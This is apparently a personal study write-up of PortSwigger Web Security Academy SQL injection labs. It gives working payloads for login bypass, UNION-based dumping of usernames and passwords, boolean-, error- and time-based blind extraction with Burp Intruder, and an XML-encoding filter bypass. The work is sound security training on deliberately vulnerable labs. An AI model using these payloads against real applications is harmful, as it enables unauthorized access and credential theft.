---
title: 'SQL Injection'
subtitle: 'PortSwigger Web Security Academy Labs'
author: 'Dan Egner'
date: 'PDF generated: \today'

titlepage: true
toc: true
---




# SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

<https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data>

Completed: 2022-12-09


## Summary


The 'category' URL parameter was vulnerable to SQLi. A subsequent part of the SQL query could be eliminated using a comment character and the query's logic could be further altered using an 'OR 1=1' expression. This made the application return more data from the table than was intended.


## Objective

> This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
>
> ```sql
> SELECT * FROM products WHERE category = 'Gifts' AND released = 1
> ```
>
>> To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products. 


## Solution

1. Click one of the 'Refine your search' filters
1. Send the GET request to Repeater
1. Edit the 'category' parameter in the request as follows, then send:

    ```
    GET /filter?category=Gifts'+OR+1=1-- HTTP/1.1
    ```

    The resulting SQL query will be:

    ```sql
	SELECT * FROM products WHERE category = 'Gifts' OR 1=1-- AND released = 1
    ```

	The '\--' is an SQL comment. This eliminates the subsequent part of the SQL query. The 'OR 1=1' causes the query to reduce to `SELECT * FROM products`. The application then displays all products from all categories, both released and unreleased.




# SQL injection vulnerability allowing login bypass

<https://portswigger.net/web-security/sql-injection/lab-login-bypass>

Completed: 2022-12-09


## Summary

The 'username' parameter was vulnerable to SQLi. A comment character could be used to eliminate the password requirement in the underlying SQL query. This allowed logging in as a user without knowledge of their password.


## Objective

> This lab contains a SQL injection vulnerability in the login function.
>
>> To solve the lab, perform a SQL injection attack that logs in to the application as the `administrator` user.


## Solution

1. The 'username' field encodes single quotes
1. Submit `administrator'--` in the 'username' field, intercepting the POST request
1. In the 'username' parameter value, change the encoded single quote back into a raw single quote. Forward the request

    The resultant SQL query was:

    ```sql
	SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
    ```

    You are now logged in as `administrator` without needing the passoword.




# SQL injection UNION attack, determining the number of columns returned by the query

<https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns>

Completed: 2022-12-09


## Summary

The 'category' URL parameter was vulnerable to SQLi. The number of columns returned by the query could be determined using 'UNION SELECT' or 'ORDER BY' expressions.


## Objective

> This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
>
>> To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.


## Solution

1. Send a 'Refine your search' request to Repeater
1. Edit the request as below until the server no longer returns a server error:

    ```
	GET /filter?category=Pets'+UNION+SELECT+NULL-- HTTP/1.1
	GET /filter?category=Pets'+UNION+SELECT+NULL,NULL-- HTTP/1.1
	GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL-- HTTP/1.1
    ```

	Alternatively, can do the following. Here, only the fourth payload triggers a server error:

    ```
	GET /filter?category=Pets'+ORDER+BY+1-- HTTP/1.1
	GET /filter?category=Pets'+ORDER+BY+2-- HTTP/1.1
	GET /filter?category=Pets'+ORDER+BY+3-- HTTP/1.1
	GET /filter?category=Pets'+ORDER+BY+4-- HTTP/1.1
    ```

    In either case, this demonstrates that three columns are returned by the SQL query.
 



# SQL injection UNION attack, finding a column containing text

<https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text>

Completed: 2022-12-09


## Summary

The 'category' URL parameter was vulnerable to SQLi. Using 'UNION SELECT' expressions, the number of columns returned by the query could be determined. Which columns contained data of type text could also be determined.


## Objective

> This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
>
>> The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.


## Solution

1. Three columns are being returned by the SQL query (determined with payload `'+UNION+SELECT+NULL,NULL,NULL--`)
1. The second column returns text:

    ```
	GET /filter?category='+UNION+SELECT+'a',NULL,NULL-- HTTP/1.1
    ```

	--> Internal server error

    ```
	GET /filter?category='+UNION+SELECT+NULL,'a',NULL-- HTTP/1.1
    ```

	--> No error

    ```
	GET /filter?category='+UNION+SELECT+NULL,NULL,'a'-- HTTP/1.1
    ```
	--> Internal server error

1. To retrieve the random string the lab asks for:

    ```
	GET /filter?category='+UNION+SELECT+NULL,'wm7NDN',NULL-- HTTP/1.1
    ```




# SQL injection UNION attack, retrieving data from other tables

<https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables>

Completed: 2022-12-09


## Summary

The 'category' URL parameter was vulnerable to SQLi. Using 'UNION SELECT' expressions, the number of columns returned and which columns contained text could be determined. A further 'UNION SELECT' expression allowed retrieval of all data from a different table.


## Objective

>  This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
>
> The database contains a different table called `users`, with columns called `username` and `password`.
>
>> To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the `administrator` user. 


## Solution

1. Click one of the search filter buttons and send the GET request to Repeater
1. Confirm the number of returned columns (two) with the following:

    ```
	GET /filter?category='+UNION+SELECT+NULL,NULL--
    ```

1. Confirm both returned columns contain text data type:

    ```
	GET /filter?category='+UNION+SELECT+'a','a'--
    ```

1. Retrieve usernames and passwords from table `users` in the two returned columns:

    ```
	GET /filter?category='+UNION+SELECT+username,+password+FROM+users-- HTTP/1.1
    ```

	This returns `carlos`, `administrator`, and `wiener` and their passwords.

1. Log in as `administrator`




# SQL injection UNION attack, retrieving multiple values in a single column

<https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column>

Completed: 2022-12-12


## Summary

The 'category' URL parameter was vulnerable to SQLi. Using 'UNION SELECT' expressions, it could be determined that one column containing text was returned. A further 'UNION SELECT' expression, combined with concatenation operators, allowed multiple columns from another table to be retrieved using this single returned column.


## Objective

> This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
>
> The database contains a different table called `users`, with columns called `username` and `password`.
>
>> To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the `administrator` user.


## Solution

1. Click a search filter button and send the GET request to Repeater
1. Confirm two columns are returned:

    ```
	GET /filter?category='+UNION+SELECT+NULL,NULL-- HTTP/1.1
    ```

1. Find that only the second column returns text:

    ```
	GET /filter?category='+UNION+SELECT+'a',NULL-- HTTP/1.1
	GET /filter?category='+UNION+SELECT+NULL,'a'-- HTTP/1.1
    ```

1. Retrieve both the `username` and `password` columns of table `users` by concatenating the values and retrieving them from the single text column:

    ```
	GET /filter?category='+UNION+SELECT+NULL,username||'~'||password+FROM+users-- HTTP/1.1
    ```

	This is the "Oracle" SQL concatenation syntax.

1. Log in as `administrator`




# Blind SQL injection with conditional responses

<https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses>

Completed: 2022-12-12


## Summary

The 'TrackingId' cookie was vulnerable to blind SQLi, revealed by presence/lack of a 'Welcome back!' message on the page. This could be used to determine the length of a target's password and reconstruct the password character by character.


## Objective

> This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
>
> The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
>
> The database contains a different table called `users`, with columns called `username` and `password`. You need to exploit the blind SQL injection vulnerability to find out the password of the `administrator` user.
>
>> To solve the lab, log in as the `administrator` user.


## Solution

1. Click on search filter, send request to Repeater
1. The SQLi is within the `TrackingID` cookie value. Show that it's vulnerable to SQLi:

    ```
    Cookie: TrackingId=<value>;
    ```

    --> "Welcome back!" message displayed on page (i.e. rows returned)

    ```
    Cookie: TrackingId=<value>';
    ```

    --> no "Welcome back" message (i.e. no rows returned)

    ```
    Cookie: TrackingId=<value>'--;
    ```

    --> "Welcome back!" message displayed on page (i.e. rows returned)

1. Alternative way to prove that the `TrackingId` cookie is vulnerable to blind SQL injection:

    ```
	Cookie: TrackingId=<value>'+AND+'1'='1; session=...
	Cookie: TrackingId=<value>'+AND+'1'='2; session=...
    ```

1. Determine one column is returned:

    ```
    Cookie: TrackingId=<value>'+UNION+SELECT+NULL--; session=...
    ```

	"Welcome back!" is displayed on page, so rows were returned and the query was successful.

1. Determine that the column returns text:

    ```
	Cookie: TrackingId=<value>'+UNION+SELECT+'a'--; session=...
    ```

1. Determine that the SQL database is Microsoft, PostgreSQL, or MySQL:

    ```
	Cookie: TrackingId=<value>'+UNION+SELECT+table_name+FROM+information_schema.tables--; session=...
    ```

1. Confirm that `administrator` user exists:

    ```
	Cookie: TrackingId=MPcP8sfwI8gKIziO'+AND+(SELECT+'a'+FROM+users+WHERE+username='administrator')='a; session=...
    ```

1. Determine length of `administrator` user's password:

    ```
	Cookie: TrackingId=VDLcH2QFBjC6CEMp'+AND+(SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+LENGTH(password)>1)='a; session=...
	Cookie: TrackingId=VDLcH2QFBjC6CEMp'+AND+(SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+LENGTH(password)>2)='a; session=...

	...

	Cookie: TrackingId=VDLcH2QFBjC6CEMp'+AND+(SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+LENGTH(password)>19)='a; session=...
	Cookie: TrackingId=VDLcH2QFBjC6CEMp'+AND+(SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+LENGTH(password)=20)='a; session=...
    ```

	The `administrator` user's password is 20 characters long.

1. Reconstruct the `administrator` user's password one character at a time. Use Intruder like so:
	* Cluster bomb attack
	* Two positions:

    ```
    Cookie: TrackingId=MPcP8sfwI8gKIziO'+AND+(SELECT+SUBSTRING(password,§1§,1)+FROM+users+WHERE+username='administrator')='§a§; session=...
    ```

	* Payload set 1: Numbers 1 to 20, min digits 1, max digits 2, no fractions
	* Payload set 2: Brute forcer, lowercase alphanumeric character set, min and max length 1
	* Max concurrent requests 1
	* Grep match results for 'Welcome back!'
	* Order results by grep match
	* Right click and highlight all 20 successful results
	* Filter: show only highlighted results
	* Order results by payload 1
	* Read off the password: `m704uxeq9bnk2d6czhoz`

1. Log in as `administrator`




# Blind SQL injection with conditional errors

<https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors>

Completed: 2022-12-13


## Summary

The 'TrackingId' cookie was vulnerable to blind SQLi, revealed by presence/lack of server errors. 'CASE' SQL expressions could be used to trigger these errors and thereby test conditions. This could be used to determine length of a target's password and reconstruct the password character by character.


## Objective

> This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
>
> The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
>
> The database contains a different table called `users`, with columns called `username` and `password`. You need to exploit the blind SQL injection vulnerability to find out the password of the `administrator` user.
>
>> To solve the lab, log in as the `administrator` user.


## Solution

1. Click search filter, send request to Repeater. The SQLi is within the `TrackingId` cookie
1. Confirm that you can trigger SQL syntax errors:

    ```
	Cookie: TrackingId=ib1L0QeHocbczSua'; session=...										    # error
	Cookie: TrackingId=ib1L0QeHocbczSua''; session=...										    # no error
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+'')||'; session=...						    # error
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+''+FROM+dual)||'; session=...				    # no error, so must be Oracle SQL
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+''+FROM+faketable)||'; session=...		    # error, despite valid syntax
    ```

	So the errors are SQL syntax query errors, not something else.

1. Verify table `users` exists:

    ```
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+FROM+users+WHERE+ROWNUM=1||'; session=...
    ```

1. Check that we can test conditions:

    ```
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+CASE+WHEN+(1=1)+THEN+TO_CHAR(1/0)+ELSE+''+END+FROM+dual)||'; session=...		# error
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+CASE+WHEN+(1=2)+THEN+TO_CHAR(1/0)+ELSE+''+END+FROM+dual)||'; session=...		# no error
    ```

	The above 'CASE' tests a condition: if true, it divides by zero and errors; if false, it does nothing and doesn't error.

1. Determine the length of `administrator`'s password:

	```	
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+CASE+WHEN+LENGTH(password)>1+THEN+TO_CHAR(1/0)+ELSE+''+END+FROM+users+WHERE+username='administrator')||'; session=...
    
	...
    
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+CASE+WHEN+LENGTH(password)>19+THEN+TO_CHAR(1/0)+ELSE+''+END+FROM+users+WHERE+username='administrator')||'; session=...
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+CASE+WHEN+LENGTH(password)>20+THEN+TO_CHAR(1/0)+ELSE+''+END+FROM+users+WHERE+username='administrator')||'; session=...
    ```

	It is 20 characters long, because it stops returning errors when querying whether length exceeds 20 or above.

1. Reconstruct the `administrator` user's password one character at a time. Use Intruder like so:
	* Cluster bomb attack
	* Two positions:

    ```
	Cookie: TrackingId=ib1L0QeHocbczSua'||(SELECT+CASE+WHEN+SUBSTR(password,§1§,1)='§a§'+THEN+TO_CHAR(1/0)+ELSE+''+END+FROM+users+WHERE+username='administrator')||'; session=...
    ```

	* Payload set 1: Numbers 1 to 20, min digits 1, max digits 2, no fractions
	* Payload set 2: Brute forcer, lowercase alphanumeric character set, min and max length 1
	* Max concurrent requests 1
	* Grep match results for "Internal Server Error"
	* Order results by grep match
	* Right click and highlight all 20 successful results
	* Filter: show only highlighted results
	* Order results by payload 1
	* Read off the password: `5o91v5unq97dj3rfvg0j`

1. Log in as `administrator`




# Visible error-based SQL injection

<https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based>

Completed: 2023-07-10


## Summary

The `TrackingId` cookie value could be used to perform SQL injection. Were it not for the fact the application displayed visible SQL syntax error messages on the page, this would have been a blind SQLi vulnerability. `CAST` expressions that attempted to convert target data to an incompatible data type allowed usernames and passwords to be displayed within the error messages.


## Objective

> This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned.
>
> The database contains a different table called `users`, with columns called `username` and `password`.
>
>> To solve the lab, find a way to leak the password for the `administrator` user, then log in to their account. 


## Solution

1. Determine SQL injection is present in `TrackingId` cookie value:
    1. No error

	    ```
	    Cookie: TrackingId=uh6aYAQLm7FCXiFE;
	    ```
    
    1. Error displayed on page, containing the underlying SQL query

	    ```
	    Cookie: TrackingId=uh6aYAQLm7FCXiFE';
    	```

        ```	
        Unterminated string literal started at position 52 in SQL SELECT * FROM tracking WHERE id = 'uh6aYAQLm7FCXiFE''. Expected  char
	    ```

    1. No error

	    ```
	    Cookie: TrackingId=uh6aYAQLm7FCXiFE'--;
	    ```

1. Confirm the database is running PostgreSQL:
	
	```
	Cookie: TrackingId=uh6aYAQLm7FCXiFE'+UNION+SELECT+version()--;
	```
	
    This does not trigger an error, whereas equivalent queries using Oracle/Microsoft SQL syntax do trigger errors.

1. Use a `CAST` expression to make the content of a `SELECT` expression appear in the visible error message:
    1. No error

        ```
        Cookie: TrackingId=uh6aYAQLm7FCXiFE'+AND+1=CAST((SELECT+1)+AS+int)--;
        ```

    1. Error!

        ```
        Cookie: TrackingId=uh6aYAQLm7FCXiFE'+AND+1=CAST((SELECT+'aaa')+AS+int)--;
        ```

        ```
        ERROR: invalid input syntax for type integer: "aaa"
        ```

    Next, we can alter the `SELECT` expression to retrieve data from the `users` table.

 1. Discover that there is a character limit for the SQL query:

    ```
    Cookie: TrackingId=uh6aYAQLm7FCXiFE'+AND+1=CAST((SELECT+username+FROM+users)+AS+int)--;
    ```

    This results in an 'Unterminated string' error because the SQL query is cut off part way. See the error below:

    ```
    Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = 'uh6aYAQLm7FCXiFE' AND 1=CAST((SELECT username FROM users) AS'. Expected  char
    ```
    
    We now know there is a character limit on the SQL query. In all subsequent requests, delete the legitimate value of the cookie (in this case, `uh6aYAQLm7FCXiFE`) from the start of the query to free up characters.
    
1. Fix the query to ensure only one row is returned by the `SELECT` expression:
    1. Error

        ```
        Cookie: TrackingId='+AND+1=CAST((SELECT+username+FROM+users)+AS+int)--;
        ```

        ```
        ERROR: more than one row returned by a subquery used as an expression
        ```

        So, add `LIMIT 1` to the `SELECT` expression to return only one row.
   
    1. No error! Visible error message contains the value retrieved, e.g. the username 'administrator'

        ```
        Cookie: TrackingId='+AND+1=CAST((SELECT+username+FROM+users+LIMIT+1)+AS+int)--;
        ```

        ```
        ERROR: invalid input syntax for type integer: "administrator"
        ```

1. Retrieve `administrator`'s password:

    ```
    Cookie: TrackingId='+AND+1=CAST((SELECT+password+FROM+users+LIMIT+1)+AS+int)--;
    ```

    ```
    ERROR: invalid input syntax for type integer: "5t7my7x44b4buj8o3t1r"
    ```

1. Log in as `administrator`




# Blind SQL injection with time delays

<https://portswigger.net/web-security/sql-injection/blind/lab-time-delays>

Completed: 2022-12-13


## Summary

The 'TrackingId' cookie was vulnerable to blind SQLi. The application could be made to execute arbitrary time delays before sending responses by using concatenation operators and sleep commands.


## Objective

> This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
>
> The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
>
>> To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.


## Solution

1. In Repeater, edit the `TrackingId` cookie like so, then click send:

    ```
	Cookie: TrackingId=KBNTGOgrYOk0xkYO'||pg_sleep(10)--; session=...
    ```




# Blind SQL injection with time delays and information retrieval

<https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval>

Completed: 2022-12-13


## Summary

The 'TrackingId' cookie was vulnerable to blind SQLi. The application could be made to execute arbitrary time delays before sending responses by using concatenation operators and sleep commands. The 'CASE' SQL expression, combined with sleep commands, could be used to to test conditions. This could be used to determine the length of a target's password and reconstruct the password character by character.


## Objective

> This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
>
> The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
>
> The database contains a different table called `users`, with columns called `username` and `password`. You need to exploit the blind SQL injection vulnerability to find out the password of the `administrator` user.
>
>> To solve the lab, log in as the `administrator` user.


## Solution

1. Confirm blind SQLi is possible:

    ```
	Cookie: TrackingId=iiAMEYvkaq5cpoIn'||pg_sleep(10)--; session=...
    ```

1. Confirm that we can test boolean conditions using a time delay (or lack thereof):

    ```
	Cookie: TrackingId=uG1npUl0ctvXFORV'||(SELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END)--; session=...
	Cookie: TrackingId=uG1npUl0ctvXFORV'||(SELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END)--; session=...
    ```

1. Confirm that user `administrator` exists within table `users`:

    ```
	Cookie: TrackingId=uG1npUl0ctvXFORV'||(SELECT+CASE+WHEN+((SELECT+'a'+FROM+users+WHERE+username='administrator')='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END)--; session=...
	Cookie: TrackingId=uG1npUl0ctvXFORV'||(SELECT+CASE+WHEN+((SELECT+'a'+FROM+users+WHERE+username='notarealuser')='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END)--; session=...
    ```

1. Confirm that user `administrator`'s password is 20 characters long:

    ```
	Cookie: TrackingId=uG1npUl0ctvXFORV'||(SELECT+CASE+WHEN+((SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+LENGTH(password)>19)='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END)--; session=...
	Cookie: TrackingId=uG1npUl0ctvXFORV'||(SELECT+CASE+WHEN+((SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+LENGTH(password)>20)='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END)--; session=...
    ```

1. Reconstruct the `administrator` user's password one character at a time. Use Intruder like so:
	* Cluster bomb attack
	* Two positions:

        ```
		Cookie: TrackingId=uG1npUl0ctvXFORV'||(SELECT+CASE+WHEN+((SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END)--; session=...
        ```

	* Payload set 1: Numbers 1 to 20, min digits 1, max digits 2, no fractions
	* Payload set 2: Brute forcer, lowercase alphanumeric character set, min and max length 1
	* Max concurrent requests 1
	* Order results by response time
	* Right click and highlight all 20 successful results (those with response time > 1000 ms)
	* Filter: show only highlighted results
	* Order results by payload 1
	* Read off the password: `l1dwjsuz2b76l3oyhlwx`

1. Log in as `administrator`




# Blind SQL injection with out-of-band interaction

<https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band>

Completed: TKTK




# Blind SQL injection with out-of-band data exfiltration

<https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration>

Completed: TKTK




# SQL injection attack, querying the database type and version on Oracle

<https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle>

Completed: 2022-12-12


## Summary

The 'category' URL parameter was vulnerable to SQL injection. It was possible to use built in Oracle SQL commands to query the database type and version via a UNION attack.


## Objective

> This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
>
>> To solve the lab, display the database version string.


## Solution

1. Click one of the search filters, send the request to Repeater
1. Determine that two columns are returned (note that Oracle SQL needs a `FROM` statement, and Oracle has a built-in table `dual`):

    ```
	GET /filter?category='+UNION+SELECT+NULL,NULL+FROM+dual--
    ```

1. Determine that both returned columns contain text:

    ```
	GET /filter?category='+UNION+SELECT+'a','a'+FROM+dual--
    ```

1. Get the database version information:

    ```
	GET /filter?category='+UNION+SELECT+banner,NULL+FROM+v$version-- HTTP/1.1
    ```

	Oracle database version info can also be retrieved using `SELECT version FROM v$instance`.




# SQL injection attack, querying the database type and version on MySQL and Microsoft

<https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft>

Completed: 2022-12-12


## Summary

The 'category' URL parameter was vulnerable to SQL injection. It was possible to use built in MySQL commands to query the database type and version via a UNION attack.


## Objective

>  This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
>
>> To solve the lab, display the database version string.


## Solution

1. Click a search filter, send request to Repeater
1. Determine two columns are returned (note that MySQL uses "#" for comments):

    ```
	GET /filter?category='+UNION+SELECT+NULL,NULL# HTTP/1.1
    ```

1. Determine both columns return text:

    ```
	GET /filter?category='+UNION+SELECT+'a','a'# HTTP/1.1
    ```

1. Get version info:

    ```
	GET /filter?category='+UNION+SELECT+@@version,NULL# HTTP/1.1
    ```




# SQL injection attack, listing the database contents on non-Oracle databases

<https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle>

Completed: 2022-12-12


## Summary

The 'category' URL parameter was vulnerable to SQL injection. It was possible to query the built in 'information_schema.tables' and 'information_schema.columns' tables via UNION attack and use this information to retrieve usernames and passwords from another table.


## Objective

> This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
>
> The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
>
>> To solve the lab, log in as the `administrator` user.


## Solution

1. Click a search filter and send request to Repeater
1. Determine that two columns are returned:

    ```
	GET /filter?category='+UNION+SELECT+NULL,NULL-- HTTP/1.1
    ```

1. Determine that both columns return text:

    ```
	GET /filter?category='+UNION+SELECT+'a','a'-- HTTP/1.1
    ```

1. Get list of table names:

    ```
	GET /filter?category='+UNION+SELECT+table_name,NULL+FROM+information_schema.tables-- HTTP/1.1
    ```

	Search this list for one containing the word "users".

1. Get list of column names for this particular table:

    ```
	GET /filter?category='+UNION+SELECT+column_name,NULL+FROM+information_schema.columns+WHERE+table_name='users_wbkavv'-- HTTP/1.1
    ```

1. Return the contents of these two columns (usernames and passwords):

    ```
	GET /filter?category='+UNION+SELECT+username_yveioy,password_kijoqo+FROM+users_wbkavv-- HTTP/1.1
    ```

	This returns the usernames and passwords of all registered users.

1. Log in as `administrator`




# SQL injection attack, listing the database contents on Oracle

<https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle>

Completed: 2023-06-14


## Summary

The 'category' URL parameter was vulnerable to SQL injection. It was possible to query the built in 'all_tables' table via UNION attack and use this information to retrieve usernames and passwords from another table.


## Objective

> This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
>
> The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
>
>> To solve the lab, log in as the `administrator` user. 


## Solution

1. Confirm SQLi present

    ```
    GET /filter?category=Tech+gifts HTTP/2         [no error]
    GET /filter?category=Tech+gifts' HTTP/2        [error]
    GET /filter?category=Tech+gifts'-- HTTP/2      [no error]
    ```

1. Determine number of columns returned (two)

    ```
    GET /filter?category=Tech+gifts'+UNION+SELECT+NULL+FROM+dual-- HTTP/2           [error]
    GET /filter?category=Tech+gifts'+UNION+SELECT+NULL,NULL+FROM+dual-- HTTP/2      [no error]
    ```

1. Determine which columns return text (both)

    ```
    GET /filter?category=Tech+gifts'+UNION+SELECT+'a',NULL+FROM+dual-- HTTP/2      [no error]
    GET /filter?category=Tech+gifts'+UNION+SELECT+NULL,'a'+FROM+dual-- HTTP/2      [no error]
    ```

1. Get table names

    ```
    GET /filter?category=Tech+gifts'+UNION+SELECT+table_name,NULL+FROM+all_tables-- HTTP/2
    ```

    Output contains 'USERS_IOJHAT'.

1. Get column names for users table

    ```
    GET /filter?category=Tech+gifts'+UNION+SELECT+column_name,NULL+FROM+user_tab_columns+WHERE+table_name+=+'USERS_IOJHAT'-- HTTP/2
    ```

    Output contains 'USERNAME_MHETOG' and 'PASSWORD_HABODS'.

1. Get username and password columns from users table

    ```
    GET /filter?category=Tech+gifts'+UNION+SELECT+USERNAME_MHETOG,PASSWORD_HABODS+FROM+USERS_IOJHAT-- HTTP/2
    ```

    Output contains administrator username and password.

1. Log in as administrator user




# SQL injection with filter bypass via XML encoding

<https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding>

Completed: 2023-06-13


## Summary

The 'storeId' parameter was vulnerable to SQLi. This parameter was contained within XML in the body of POST requests generated by using the stock checker functionality. The server removed common SQL expressions and commands including the word 'UNION'. This filter could be bypassed by encoding the payload with Numeric Character References before submitting the request. A UNION attack could then be used to retrieve usernames and passwords from a different table.


## Objective

> This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.
>
> The database contains a users table, which contains the usernames and passwords of registered users.
>
>> To solve the lab, perform a SQL injection attack to retrieve the admin user's credentials, then log in to their account.


## Solution

1. `POST /product/stock` contains 'productId' and 'storeId' parameters in XML within request body
1. Hypothetical SQL query running under the hood:

    ```sql
    SELECT * FROM stock WHERE productId = 1 and stockId = 1
    ```

1. Maths expressions within 'storeId' parameter are evaluated (e.g. 1+1 evaluates to storeId of 2), so SQLi likely
1. Certain SQL commands are filtered, triggering 'Attack detected' response
1. Bypass using XML's ability to interpret Numeric Character References (can use Burp extension Hackvertor's 'hex_entities' or 'dec_entities' encoding)
1. Run SQL injection as follows:

    The hypothetical SQL query with malicious addition:

    ```sql
    SELECT * FROM stock WHERE productId=1 AND stockId=1 UNION SELECT password FROM users WHERE username = 'administrator'
    ```

    XML sent in the HTTP body, using Hackvertor to encode the malicious SQL:

    ```xml
    <?xml version="1.0" encoding="UTF-8"?>
        <stockCheck>
            <productId>
            1
            </productId>
            <storeId>
            1 <@hex_entities>UNION SELECT password FROM users WHERE username = 'administrator'<@/hex_entities>
            </storeId>
        </stockCheck>
    ```

1. Output contains `administrator`'s password
1. Log in as `administrator`

